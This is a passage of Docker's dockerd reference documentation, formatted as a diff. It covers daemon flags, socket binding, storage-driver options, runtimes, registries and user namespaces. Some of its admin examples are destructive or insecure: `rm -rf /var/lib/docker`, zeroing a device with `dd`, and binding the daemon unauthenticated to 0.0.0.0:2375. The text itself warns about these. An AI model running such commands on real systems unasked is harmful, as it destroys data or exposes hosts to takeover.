+  -p, --pidfile string                        Path to use for daemon PID file (default "/var/run/docker.pid")
+      --raw-logs                              Full timestamps without ANSI coloring
+      --registry-mirror value                 Preferred Docker registry mirror (default [])
+      --seccomp-profile value                 Path to seccomp profile
+      --selinux-enabled                       Enable selinux support
+      --shutdown-timeout=15                   Set the shutdown timeout value in seconds
+  -s, --storage-driver string                 Storage driver to use
+      --storage-opt value                     Storage driver options (default [])
+      --swarm-default-advertise-addr string   Set default address or interface for swarm advertised address
+      --tls                                   Use TLS; implied by --tlsverify
+      --tlscacert string                      Trust certs signed only by this CA (default "/root/.docker/ca.pem")
+      --tlscert string                        Path to TLS certificate file (default "/root/.docker/cert.pem")
+      --tlskey string                         Path to TLS key file (default "/root/.docker/key.pem")
+      --tlsverify                             Use TLS and verify the remote
+      --userland-proxy                        Use userland proxy for loopback traffic (default true)
+      --userland-proxy-path string            Path to the userland proxy binary
+      --userns-remap string                   User/Group setting for user namespaces
+  -v, --version                               Print version information and quit
+```
+
+Options with [] may be specified multiple times.
+
+dockerd is the persistent process that manages containers. Docker
+uses different binaries for the daemon and client. To run the daemon you
+type `dockerd`.
+
+To run the daemon with debug output, use `dockerd -D`.
+
+## Daemon socket option
+
+The Docker daemon can listen for [Docker Engine API](../api/)
+requests via three different types of Socket: `unix`, `tcp`, and `fd`.
+
+By default, a `unix` domain socket (or IPC socket) is created at
+`/var/run/docker.sock`, requiring either `root` permission, or `docker` group
+membership.
+
+If you need to access the Docker daemon remotely, you need to enable the `tcp`
+Socket. Beware that the default setup provides un-encrypted and
+un-authenticated direct access to the Docker daemon - and should be secured
+either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by
+putting a secure web proxy in front of it. You can listen on port `2375` on all
+network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network
+interface using its IP address: `-H tcp://192.168.59.103:2375`. It is
+conventional to use port `2375` for un-encrypted, and port `2376` for encrypted
+communication with the daemon.
+
+> **Note:**
+> If you're using an HTTPS encrypted socket, keep in mind that only
+> TLS1.0 and greater are supported. Protocols SSLv3 and under are not
+> supported anymore for security reasons.
+
+On Systemd based systems, you can communicate with the daemon via
+[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html),
+use `dockerd -H fd://`. Using `fd://` will work perfectly for most setups but
+you can also specify individual sockets: `dockerd -H fd://3`. If the
+specified socket activated files aren't found, then Docker will exit. You can
+find examples of using Systemd socket activation with Docker and Systemd in the
+[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/).
+
+You can configure the Docker daemon to listen to multiple sockets at the same
+time using multiple `-H` options:
+
+```bash
+# listen using the default unix socket, and on 2 specific IP addresses on this host.
+$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2
+```
+
+The Docker client will honor the `DOCKER_HOST` environment variable to set the
+`-H` flag for the client.
+
+```bash
+$ docker -H tcp://0.0.0.0:2375 ps
+# or
+$ export DOCKER_HOST="tcp://0.0.0.0:2375"
+$ docker ps
+# both are equal
+```
+
+Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than
+the empty string is equivalent to setting the `--tlsverify` flag. The following
+are equivalent:
+
+```bash
+$ docker --tlsverify ps
+# or
+$ export DOCKER_TLS_VERIFY=1
+$ docker ps
+```
+
+The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`
+environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes
+precedence over `HTTP_PROXY`.
+
+### Bind Docker to another host/port or a Unix socket
+
+> **Warning**:
+> Changing the default `docker` daemon binding to a
+> TCP port or Unix *docker* user group will increase your security risks
+> by allowing non-root users to gain *root* access on the host. Make sure
+> you control access to `docker`. If you are binding
+> to a TCP port, anyone with access to that port has full Docker access;
+> so it is not advisable on an open network.
+
+With `-H` it is possible to make the Docker daemon to listen on a
+specific IP and port. By default, it will listen on
+`unix:///var/run/docker.sock` to allow only local connections by the
+*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP
+to give access to everybody, but that is **not recommended** because
+then it is trivial for someone to gain root access to the host where the
+daemon is running.
+
+Similarly, the Docker client can use `-H` to connect to a custom port.
+The Docker client will default to connecting to `unix:///var/run/docker.sock`
+on Linux, and `tcp://127.0.0.1:2376` on Windows.
+
+`-H` accepts host and port assignment in the following format:
+
+    tcp://[host]:[port][path] or unix://path
+
+For example:
+
+-   `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption
+    is on, or port `2375` when communication is in plain text.
+-   `tcp://host:2375` -> TCP connection on
+    host:2375
+-   `tcp://host:2375/path` -> TCP connection on
+    host:2375 and prepend path to all requests
+-   `unix://path/to/socket` -> Unix socket located
+    at `path/to/socket`
+
+`-H`, when empty, will default to the same value as
+when no `-H` was passed in.
+
+`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port`
+
+Run Docker in daemon mode:
+
+```bash
+$ sudo <path to>/dockerd -H 0.0.0.0:5555 &
+```
+
+Download an `ubuntu` image:
+
+```bash
+$ docker -H :5555 pull ubuntu
+```
+
+You can use multiple `-H`, for example, if you want to listen on both
+TCP and a Unix socket
+
+```bash
+# Run docker in daemon mode
+$ sudo <path to>/dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock &
+# Download an ubuntu image, use default Unix socket
+$ docker pull ubuntu
+# OR use the TCP port
+$ docker -H tcp://127.0.0.1:2375 pull ubuntu
+```
+
+### Daemon storage-driver option
+
+The Docker daemon has support for several different image layer storage
+drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`.
+
+The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that
+is unlikely to be merged into the main kernel. These are also known to cause
+some serious kernel crashes. However, `aufs` allows containers to share
+executable and shared library memory, so is a useful choice when running
+thousands of containers with the same program or libraries.
+
+The `devicemapper` driver uses thin provisioning and Copy on Write (CoW)
+snapshots. For each devicemapper graph location – typically
+`/var/lib/docker/devicemapper` – a thin pool is created based on two block
+devices, one for data and one for metadata. By default, these block devices
+are created automatically by using loopback mounts of automatically created
+sparse files. Refer to [Storage driver options](#storage-driver-options) below
+for a way how to customize this setup.
+[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/)
+article explains how to tune your existing setup without the use of options.
+
+The `btrfs` driver is very fast for `docker build` - but like `devicemapper`
+does not share executable memory between devices. Use
+`dockerd -s btrfs -g /mnt/btrfs_partition`.
+
+The `zfs` driver is probably not as fast as `btrfs` but has a longer track record
+on stability. Thanks to `Single Copy ARC` shared blocks between clones will be
+cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem
+set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options).
+
+The `overlay` is a very fast union filesystem. It is now merged in the main
+Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay`
+also supports page cache sharing, this means multiple containers accessing
+the same file can share a single page cache entry (or entries), it makes
+`overlay` as efficient with memory as `aufs` driver. Call
+`dockerd -s overlay` to use it.
+
+> **Note:**
+> As promising as `overlay` is, the feature is still quite young and should not
+> be used in production. Most notably, using `overlay` can cause excessive
+> inode consumption (especially as the number of images grows), as well as
+> being incompatible with the use of RPMs.
+
+The `overlay2` uses the same fast union filesystem but takes advantage of
+[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux
+kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2`
+to use it.
+
+> **Note:**
+> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any
+> Copy on Write filesystem and should only be used over `ext4` partitions.
+
+### Storage driver options
+
+Particular storage-driver can be configured with options specified with
+`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`,
+options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`.
+
+#### Devicemapper options
+
+*   `dm.thinpooldev`
+
+    Specifies a custom block storage device to use for the thin pool.
+
+    If using a block device for device mapper storage, it is best to use `lvm`
+    to create and manage the thin-pool volume. This volume is then handed to Docker
+    to exclusively create snapshot volumes needed for images and containers.
+
+    Managing the thin-pool outside of Engine makes for the most feature-rich
+    method of having Docker utilize device mapper thin provisioning as the
+    backing storage for Docker containers. The highlights of the lvm-based
+    thin-pool management feature include: automatic or interactive thin-pool
+    resize support, dynamically changing thin-pool features, automatic thinp
+    metadata checking when lvm activates the thin-pool, etc.
+
+    As a fallback if no thin pool is provided, loopback files are
+    created. Loopback is very slow, but can be used without any
+    pre-configuration of storage. It is strongly recommended that you do
+    not use loopback in production. Ensure your Engine daemon has a
+    `--storage-opt dm.thinpooldev` argument provided.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool
+    ```
+
+*   `dm.basesize`
+
+    Specifies the size to use when creating the base device, which limits the
+    size of images and containers. The default value is 10G. Note, thin devices
+    are inherently "sparse", so a 10G device which is mostly empty doesn't use
+    10 GB of space on the pool. However, the filesystem will use more space for
+    the empty case the larger the device is.
+
+    The base device size can be increased at daemon restart which will allow
+    all future images and containers (based on those new images) to be of the
+    new base device size.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.basesize=50G
+    ```
+
+    This will increase the base device size to 50G. The Docker daemon will throw an
+    error if existing base device size is larger than 50G. A user can use
+    this option to expand the base device size however shrinking is not permitted.
+
+    This value affects the system-wide "base" empty filesystem
+    that may already be initialized and inherited by pulled images. Typically,
+    a change to this value requires additional steps to take effect:
+
+     ```bash
+    $ sudo service docker stop
+    $ sudo rm -rf /var/lib/docker
+    $ sudo service docker start
+    ```
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.basesize=20G
+    ```
+
+*   `dm.loopdatasize`
+
+    > **Note**:
+    > This option configures devicemapper loopback, which should not
+    > be used in production.
+
+    Specifies the size to use when creating the loopback file for the
+    "data" device which is used for the thin pool. The default size is
+    100G. The file is sparse, so it will not initially take up this
+    much space.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.loopdatasize=200G
+    ```
+
+*   `dm.loopmetadatasize`
+
+    > **Note**:
+    > This option configures devicemapper loopback, which should not
+    > be used in production.
+
+    Specifies the size to use when creating the loopback file for the
+    "metadata" device which is used for the thin pool. The default size
+    is 2G. The file is sparse, so it will not initially take up
+    this much space.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.loopmetadatasize=4G
+    ```
+
+*   `dm.fs`
+
+    Specifies the filesystem type to use for the base device. The supported
+    options are "ext4" and "xfs". The default is "xfs"
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.fs=ext4
+    ```
+
+*   `dm.mkfsarg`
+
+    Specifies extra mkfs arguments to be used when creating the base device.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"
+    ```
+
+*   `dm.mountopt`
+
+    Specifies extra mount options used when mounting the thin devices.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.mountopt=nodiscard
+    ```
+
+*   `dm.datadev`
+
+    (Deprecated, use `dm.thinpooldev`)
+
+    Specifies a custom blockdevice to use for data for the thin pool.
+
+    If using a block device for device mapper storage, ideally both datadev and
+    metadatadev should be specified to completely avoid using the loopback
+    device.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd \
+          --storage-opt dm.datadev=/dev/sdb1 \
+          --storage-opt dm.metadatadev=/dev/sdc1
+    ```
+
+*   `dm.metadatadev`
+
+    (Deprecated, use `dm.thinpooldev`)
+
+    Specifies a custom blockdevice to use for metadata for the thin pool.
+
+    For best performance the metadata should be on a different spindle than the
+    data, or even better on an SSD.
+
+    If setting up a new metadata pool it is required to be valid. This can be
+    achieved by zeroing the first 4k to indicate empty metadata, like this:
+
+    ```bash
+    $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1
+    ```
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd \
+          --storage-opt dm.datadev=/dev/sdb1 \
+          --storage-opt dm.metadatadev=/dev/sdc1
+    ```
+
+*   `dm.blocksize`
+
+    Specifies a custom blocksize to use for the thin pool. The default
+    blocksize is 64K.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.blocksize=512K
+    ```
+
+*   `dm.blkdiscard`
+
+    Enables or disables the use of blkdiscard when removing devicemapper
+    devices. This is enabled by default (only) if using loopback devices and is
+    required to resparsify the loopback file on image/container removal.
+
+    Disabling this on loopback can lead to *much* faster container removal
+    times, but will make the space used in `/var/lib/docker` directory not be
+    returned to the system for other use when containers are removed.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.blkdiscard=false
+    ```
+
+*   `dm.override_udev_sync_check`
+
+    Overrides the `udev` synchronization checks between `devicemapper` and `udev`.
+    `udev` is the device manager for the Linux kernel.
+
+    To view the `udev` sync support of a Docker daemon that is using the
+    `devicemapper` driver, run:
+
+    ```bash
+    $ docker info
+    [...]
+    Udev Sync Supported: true
+    [...]
+    ```
+
+    When `udev` sync support is `true`, then `devicemapper` and udev can
+    coordinate the activation and deactivation of devices for containers.
+
+    When `udev` sync support is `false`, a race condition occurs between
+    the`devicemapper` and `udev` during create and cleanup. The race condition
+    results in errors and failures. (For information on these failures, see
+    [docker#4036](https://github.com/docker/docker/issues/4036))
+
+    To allow the `docker` daemon to start, regardless of `udev` sync not being
+    supported, set `dm.override_udev_sync_check` to true:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.override_udev_sync_check=true
+    ```
+
+    When this value is `true`, the  `devicemapper` continues and simply warns
+    you the errors are happening.
+
+    > **Note:**
+    > The ideal is to pursue a `docker` daemon and environment that does
+    > support synchronizing with `udev`. For further discussion on this
+    > topic, see [docker#4036](https://github.com/docker/docker/issues/4036).
+    > Otherwise, set this flag for migrating existing Docker daemons to
+    > a daemon with a supported environment.
+
+*   `dm.use_deferred_removal`
+
+    Enables use of deferred device removal if `libdm` and the kernel driver
+    support the mechanism.
+
+    Deferred device removal means that if device is busy when devices are
+    being removed/deactivated, then a deferred removal is scheduled on
+    device. And devices automatically go away when last user of the device
+    exits.
+
+    For example, when a container exits, its associated thin device is removed.
+    If that device has leaked into some other mount namespace and can't be
+    removed, the container exit still succeeds and this option causes the
+    system to schedule the device for deferred removal. It does not wait in a
+    loop trying to remove a busy device.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.use_deferred_removal=true
+    ```
+
+*   `dm.use_deferred_deletion`
+
+    Enables use of deferred device deletion for thin pool devices. By default,
+    thin pool device deletion is synchronous. Before a container is deleted,
+    the Docker daemon removes any associated devices. If the storage driver
+    can not remove a device, the container deletion fails and daemon returns.
+
+        Error deleting container: Error response from daemon: Cannot destroy container
+
+    To avoid this failure, enable both deferred device deletion and deferred
+    device removal on the daemon.
+
+    ```bash
+    $ sudo dockerd \
+          --storage-opt dm.use_deferred_deletion=true \
+          --storage-opt dm.use_deferred_removal=true
+    ```
+
+    With these two options enabled, if a device is busy when the driver is
+    deleting a container, the driver marks the device as deleted. Later, when
+    the device isn't in use, the driver deletes it.
+
+    In general it should be safe to enable this option by default. It will help
+    when unintentional leaking of mount point happens across multiple mount
+    namespaces.
+
+*   `dm.min_free_space`
+
+    Specifies the min free space percent in a thin pool require for new device
+    creation to succeed. This check applies to both free data space as well
+    as free metadata space. Valid values are from 0% - 99%. Value 0% disables
+    free space checking logic. If user does not specify a value for this option,
+    the Engine uses a default value of 10%.
+
+    Whenever a new a thin pool device is created (during `docker pull` or during
+    container creation), the Engine checks if the minimum free space is
+    available. If sufficient space is unavailable, then device creation fails
+    and any relevant `docker` operation fails.
+
+    To recover from this error, you must create more free space in the thin pool
+    to recover from the error. You can create free space by deleting some images
+    and containers from the thin pool. You can also add more storage to the thin
+    pool.
+
+    To add more space to a LVM (logical volume management) thin pool, just add
+    more storage to the volume group container thin pool; this should automatically
+    resolve any errors. If your configuration uses loop devices, then stop the
+    Engine daemon, grow the size of loop files and restart the daemon to resolve
+    the issue.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.min_free_space=10%
+    ```
+
+*  `dm.xfs_nospace_max_retries`
+
+    Specifies the maximum number of retries XFS should attempt to complete
+    IO when ENOSPC (no space) error is returned by underlying storage device.
+
+    By default XFS retries infinitely for IO to finish and this can result
+    in unkillable process. To change this behavior one can set
+    xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting
+    ENOSPC and will shutdown filesystem.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
+    ```
+
+#### ZFS options
+
+*   `zfs.fsname`
+
+    Set zfs filesystem under which docker will create its own datasets.
+    By default docker will pick up the zfs filesystem where docker graph
+    (`/var/lib/docker`) is located.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker
+    ```
+
+#### Btrfs options
+
+*   `btrfs.min_space`
+
+    Specifies the minimum size to use when creating the subvolume which is used
+    for containers. If user uses disk quota for btrfs when creating or running
+    a container with **--storage-opt size** option, docker should ensure the
+    **size** cannot be smaller than **btrfs.min_space**.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G
+    ```
+
+#### Overlay2 options
+
+*   `overlay2.override_kernel_check`
+
+    Overrides the Linux kernel version check allowing overlay2. Support for
+    specifying multiple lower directories needed by overlay2 was added to the
+    Linux kernel in 4.0.0. However some older kernel versions may be patched
+    to add multiple lower directory support for OverlayFS. This option should
+    only be used after verifying this support exists in the kernel. Applying
+    this option on a kernel without this support will cause failures on mount.
+
+## Docker runtime execution options
+
+The Docker daemon relies on a
+[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime
+(invoked via the `containerd` daemon) as its interface to the Linux
+kernel `namespaces`, `cgroups`, and `SELinux`.
+
+By default, the Docker daemon automatically starts `containerd`. If you want to
+control `containerd` startup, manually start `containerd` and pass the path to
+the `containerd` socket using the `--containerd` flag. For example:
+
+```bash
+$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock
+```
+
+Runtimes can be registered with the daemon either via the
+configuration file or using the `--add-runtime` command line argument.
+
+The following is an example adding 2 runtimes via the configuration:
+
+```json
+{
+	"default-runtime": "runc",
+	"runtimes": {
+		"runc": {
+			"path": "runc"
+		},
+		"custom": {
+			"path": "/usr/local/bin/my-runc-replacement",
+			"runtimeArgs": [
+				"--debug"
+			]
+		}
+	}
+}
+```
+
+This is the same example via the command line:
+
+```bash
+$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
+```
+
+> **Note**: defining runtime arguments via the command line is not supported.
+
+## Options for the runtime
+
+You can configure the runtime using options specified
+with the `--exec-opt` flag. All the flag's options have the `native` prefix. A
+single `native.cgroupdriver` option is available.
+
+The `native.cgroupdriver` option specifies the management of the container's
+cgroups. You can specify only specify `cgroupfs` or `systemd`. If you specify
+`systemd` and it is not available, the system errors out. If you omit the
+`native.cgroupdriver` option,` cgroupfs` is used.
+
+This example sets the `cgroupdriver` to `systemd`:
+
+```bash
+$ sudo dockerd --exec-opt native.cgroupdriver=systemd
+```
+
+Setting this option applies to all containers the daemon launches.
+
+Also Windows Container makes use of `--exec-opt` for special purpose. Docker user
+can specify default container isolation technology with this, for example:
+
+```bash
+$ sudo dockerd --exec-opt isolation=hyperv
+```
+
+Will make `hyperv` the default isolation technology on Windows. If no isolation
+value is specified on daemon start, on Windows client, the default is
+`hyperv`, and on Windows server, the default is `process`.
+
+## Daemon DNS options
+
+To set the DNS server for all Docker containers, use:
+
+```bash
+$ sudo dockerd --dns 8.8.8.8
+```
+
+
+To set the DNS search domain for all Docker containers, use:
+
+```bash
+$ sudo dockerd --dns-search example.com
+```
+
+
+## Insecure registries
+
+Docker considers a private registry either secure or insecure. In the rest of
+this section, *registry* is used for *private registry*, and `myregistry:5000`
+is a placeholder example for a private registry.
+
+A secure registry uses TLS and a copy of its CA certificate is placed on the
+Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure
+registry is either not using TLS (i.e., listening on plain text HTTP), or is
+using TLS with a CA certificate not known by the Docker daemon. The latter can
+happen when the certificate was not found under
+`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification
+failed (i.e., wrong CA).
+
+By default, Docker assumes all, but local (see local registries below),
+registries are secure. Communicating with an insecure registry is not possible
+if Docker assumes that registry is secure. In order to communicate with an
+insecure registry, the Docker daemon requires `--insecure-registry` in one of
+the following two forms:
+
+* `--insecure-registry myregistry:5000` tells the Docker daemon that
+  myregistry:5000 should be considered insecure.
+* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries
+  whose domain resolve to an IP address is part of the subnet described by the
+  CIDR syntax, should be considered insecure.
+
+The flag can be used multiple times to allow multiple registries to be marked
+as insecure.
+
+If an insecure registry is not marked as insecure, `docker pull`,
+`docker push`, and `docker search` will result in an error message prompting
+the user to either secure or pass the `--insecure-registry` flag to the Docker
+daemon as described above.
+
+Local registries, whose IP address falls in the 127.0.0.0/8 range, are
+automatically marked as insecure as of Docker 1.3.2. It is not recommended to
+rely on this, as it may change in the future.
+
+Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted
+communication, can be useful when running a local registry.  However,
+because its use creates security vulnerabilities it should ONLY be enabled for
+testing purposes.  For increased security, users should add their CA to their
+system's list of trusted CAs instead of enabling `--insecure-registry`.
+
+## Legacy Registries
+
+Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol.  Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries.  The exception to this is `search` which can still be performed on v1 registries.
+
+## Running a Docker daemon behind an HTTPS_PROXY
+
+When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub
+certificates will be replaced by the proxy's certificates. These certificates
+need to be added to your Docker host's configuration:
+
+1. Install the `ca-certificates` package for your distribution
+2. Ask your network admin for the proxy's CA certificate and append them to
+   `/etc/pki/tls/certs/ca-bundle.crt`
+3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`.
+   The `username:` and `password@` are optional - and are only needed if your
+   proxy is set up to require authentication.
+
+This will only add the proxy and authentication to the Docker daemon's requests -
+your `docker build`s and running containers will need extra configuration to
+use the proxy
+
+## Default Ulimits
+
+`--default-ulimit` allows you to set the default `ulimit` options to use for
+all containers. It takes the same options as `--ulimit` for `docker run`. If
+these defaults are not set, `ulimit` settings will be inherited, if not set on
+`docker run`, from the Docker daemon. Any `--ulimit` options passed to
+`docker run` will overwrite these defaults.
+
+Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to
+set the maximum number of processes available to a user, not to a container. For details
+please check the [run](run.md) reference.
+
+## Nodes discovery
+
+The `--cluster-advertise` option specifies the `host:port` or `interface:port`
+combination that this particular daemon instance should use when advertising
+itself to the cluster. The daemon is reached by remote hosts through this value.
+If you  specify an interface, make sure it includes the IP address of the actual
+Docker host. For Engine installation created through `docker-machine`, the
+interface is typically `eth1`.
+
+The daemon uses [libkv](https://github.com/docker/libkv/) to advertise
+the node within the cluster. Some key-value backends support mutual
+TLS. To configure the client TLS settings used by the daemon can be configured
+using the `--cluster-store-opt` flag, specifying the paths to PEM encoded
+files. For example:
+
+```bash
+$ sudo dockerd \
+    --cluster-advertise 192.168.1.2:2376 \
+    --cluster-store etcd://192.168.1.2:2379 \
+    --cluster-store-opt kv.cacertfile=/path/to/ca.pem \
+    --cluster-store-opt kv.certfile=/path/to/cert.pem \
+    --cluster-store-opt kv.keyfile=/path/to/key.pem
+```
+
+The currently supported cluster store options are:
+
+*   `discovery.heartbeat`
+
+    Specifies the heartbeat timer in seconds which is used by the daemon as a
+    keepalive mechanism to make sure discovery module treats the node as alive
+    in the cluster. If not configured, the default value is 20 seconds.
+
+*   `discovery.ttl`
+
+    Specifies the ttl (time-to-live) in seconds which is used by the discovery
+    module to timeout a node if a valid heartbeat is not received within the
+    configured ttl value. If not configured, the default value is 60 seconds.
+
+*   `kv.cacertfile`
+
+    Specifies the path to a local file with PEM encoded CA certificates to trust
+
+*   `kv.certfile`
+
+    Specifies the path to a local file with a PEM encoded certificate.  This
+    certificate is used as the client cert for communication with the
+    Key/Value store.
+
+*   `kv.keyfile`
+
+    Specifies the path to a local file with a PEM encoded private key.  This
+    private key is used as the client key for communication with the
+    Key/Value store.
+
+*   `kv.path`
+
+    Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'.
+
+## Access authorization
+
+Docker's access authorization can be extended by authorization plugins that your
+organization can purchase or build themselves. You can install one or more
+authorization plugins when you start the Docker `daemon` using the
+`--authorization-plugin=PLUGIN_ID` option.
+
+```bash
+$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
+```
+
+The `PLUGIN_ID` value is either the plugin's name or a path to its specification
+file. The plugin's implementation determines whether you can specify a name or
+path. Consult with your Docker administrator to get information about the
+plugins available to you.
+
+Once a plugin is installed, requests made to the `daemon` through the command
+line or Docker's Engine API are allowed or denied by the plugin.  If you have
+multiple plugins installed, at least one must allow the request for it to
+complete.
+
+For information about how to create an authorization plugin, see [authorization
+plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation.
+
+
+## Daemon user namespace options
+
+The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling
+a process, and therefore a container, to have a unique range of user and
+group IDs which are outside the traditional user and group range utilized by
+the host system. Potentially the most important security improvement is that,
+by default, container processes running as the `root` user will have expected
+administrative privilege (with some restrictions) inside the container but will
+effectively be mapped to an unprivileged `uid` on the host.
+
+When user namespace support is enabled, Docker creates a single daemon-wide mapping
+for all containers running on the same engine instance. The mappings will
+utilize the existing subordinate user and group ID feature available on all modern
+Linux distributions.
+The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and
+[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be
+read for the user, and optional group, specified to the `--userns-remap`
+parameter.  If you do not wish to specify your own user and/or group, you can
+provide `default` as the value to this flag, and a user will be created on your behalf
+and provided subordinate uid and gid ranges. This default user will be named
+`dockremap`, and entries will be created for it in `/etc/passwd` and
+`/etc/group` using your distro's standard user and group creation tools.
+
+> **Note**: The single mapping per-daemon restriction is in place for now
+> because Docker shares image layers from its local cache across all
+> containers running on the engine instance.  Since file ownership must be
+> the same for all containers sharing the same layer content, the decision
+> was made to map the file ownership on `docker pull` to the daemon's user and
+> group mappings so that there is no delay for running containers once the
+> content is downloaded. This design preserves the same performance for `docker
+> pull`, `docker push`, and container startup as users expect with
+> user namespaces disabled.
+
+### Starting the daemon with user namespaces enabled
+
+To enable user namespace support, start the daemon with the
+`--userns-remap` flag, which accepts values in the following formats:
+
+ - uid
+ - uid:gid
+ - username
+ - username:groupname
+
+If numeric IDs are provided, translation back to valid user or group names
+will occur so that the subordinate uid and gid information can be read, given
+these resources are name-based, not id-based.  If the numeric ID information
+provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon
+startup will fail with an error message.
+
+**Example: starting with default Docker user management:**
+
+```bash
+$ sudo dockerd --userns-remap=default
+```
+
+When `default` is provided, Docker will create - or find the existing - user and group
+named `dockremap`. If the user is created, and the Linux distribution has
+appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated
+with a contiguous 65536 length range of subordinate user and group IDs, starting
+at an offset based on prior entries in those files.  For example, Ubuntu will
+create the following range, based on an existing user named `user1` already owning
+the first 65536 range:
+
+```bash
+$ cat /etc/subuid
+user1:100000:65536
+dockremap:165536:65536
+```
+
+If you have a preferred/self-managed user with subordinate ID mappings already
+configured, you can provide that username or uid to the `--userns-remap` flag.
+If you have a group that doesn't match the username, you may provide the `gid`
+or group name as well; otherwise the username will be used as the group name
+when querying the system for the subordinate group ID range.
+
+The output of `docker info` can be used to determine if the daemon is running
+with user namespaces enabled or not. If the daemon is configured with user
+namespaces, the Security Options entry in the response will list "userns" as
+one of the enabled security features.
+
+### Detailed information on `subuid`/`subgid` ranges
+
+Given potential advanced use of the subordinate ID ranges by power users, the
+following paragraphs define how the Docker daemon currently uses the range entries
+found within the subordinate range files.
+
+The simplest case is that only one contiguous range is defined for the
+provided user or group. In this case, Docker will use that entire contiguous
+range for the mapping of host uids and gids to the container process.  This
+means that the first ID in the range will be the remapped root user, and the
+IDs above that initial ID will map host ID 1 through the end of the range.
+
+From the example `/etc/subuid` content shown above, the remapped root
+user would be uid 165536.
+
+If the system administrator has set up multiple ranges for a single user or
+group, the Docker daemon will read all the available ranges and use the
+following algorithm to create the mapping ranges:
+
+1. The range segments found for the particular user will be sorted by *start ID* ascending.
+2. Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user.
+3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `proc/self/gid_map`.
+
+### Disable user namespace for a container
+
+If you enable user namespaces on the daemon, all containers are started
+with user namespaces enabled. In some situations you might want to disable
+this feature for a container, for example, to start a privileged container (see
+[user namespace known restrictions](#user-namespace-known-restrictions)).
+To enable those advanced features for a specific container use `--userns=host`
+in the `run/exec/create` command.
+This option will completely disable user namespace mapping for the container's user.
+
+### User namespace known restrictions
+
+The following standard Docker features are currently incompatible when
+running a Docker daemon with user namespaces enabled:
+
+ - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`)
